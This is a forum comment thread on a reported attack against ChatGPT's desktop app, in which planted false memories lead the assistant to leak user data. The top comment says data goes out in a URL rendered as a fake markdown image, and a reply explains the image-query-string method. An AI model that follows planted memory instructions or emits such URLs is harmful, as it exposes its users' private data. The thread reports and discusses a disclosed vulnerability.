109 points
*

tldr

  • it affects the desktop app of chatgpt, but likely any client that features long term memory functionality.
  • does not apply to the web interface.
  • does not apply to API access.
  • the data exfiltration is visible to the user as GPT streams the tokens that form the exfiltration URL as a (fake) markdown image.
permalink
report
reply
70 points

false memories in ChatGPT

permalink
report
reply
33 points

That’s … really bad.

permalink
report
reply
27 points

And extremely predictable

permalink
report
parent
reply
24 points

How is the application able to send data to any website? Like even if you as the legit user explicitly asked it to do that?

permalink
report
reply
24 points
*

Haven’t read details, but the classic way is to have a system visit: site.com/badimage.gif?data=abcd

Note: That s is also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.

permalink
report
parent
reply
18 points

This is why every single email client for the past 2+ decades blocks external images? This didn’t occur to the AI geniuses?

permalink
report
parent
reply
11 points

IME they usually proxy and/or prefetch images for caching instead of blocking them. Only spam content is blocked by default.

permalink
report
parent
reply
20 points

I don’t understand. Why can’t ChatGPT be a good bot and keep a secret?

permalink
report
reply
38 points

It’s a very OpenAI

permalink
report
parent
reply
6 points

Except when you ask it how it works

permalink
report
parent
reply

Technology

!technology@lemmy.world

Create post

This is a most excellent place for technology news and articles.


Our Rules


  1. Follow the lemmy.world rules.
  2. Only tech related content.
  3. Be excellent to each another!
  4. Mod approved content bots can post up to 10 articles per day.
  5. Threads asking for personal tech support may be deleted.
  6. Politics threads may be removed.
  7. No memes allowed as posts, OK to post as comments.
  8. Only approved bots from the list below, to ask if your bot can be added please contact us.
  9. Check for duplicates before posting, duplicates may be removed

Approved Bots


Community stats

  • 15K

    Monthly active users

  • 6.7K

    Posts

  • 154K

    Comments